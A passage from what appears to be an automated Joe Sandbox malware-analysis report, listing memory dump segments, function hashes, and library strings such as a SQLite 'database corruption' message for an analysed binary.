                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                      • Opcode ID: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                                                      • Instruction ID: d9705e751fb21e3d192b4bdede19ad2f65ac38aad560cf9ca4c6127ce590302b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 04112E10E0CA4241FA585F35BA5137962915FCC7A0F178335E9FE1A6FAFEADE8054603
                                                                                                                                                                                      Function 00007FFEEE237810 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,00000004,?,?,?,00007FFEEE21F51E), ref: 00007FFEEE2378FA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 3997070919-4001610065
                                                                                                                                                                                      • Opcode ID: b2a52ec6a9acb2f0d2f7fc7e27b479c82cbb8b08d5751bdb73389503be3c466e
                                                                                                                                                                                      • Instruction ID: 080040fde92827b926b5dd2f51aa03ee0aa6bf2822bc268462870fc2c1539ad7
                                                                                                                                                                                      • Opcode Fuzzy Hash: b2a52ec6a9acb2f0d2f7fc7e27b479c82cbb8b08d5751bdb73389503be3c466e
                                                                                                                                                                                      • Instruction Fuzzy Hash: B5616F32A08A8786EF608F15F44076A77A1FBC8784F564135EACD93B64DFBCE4558B01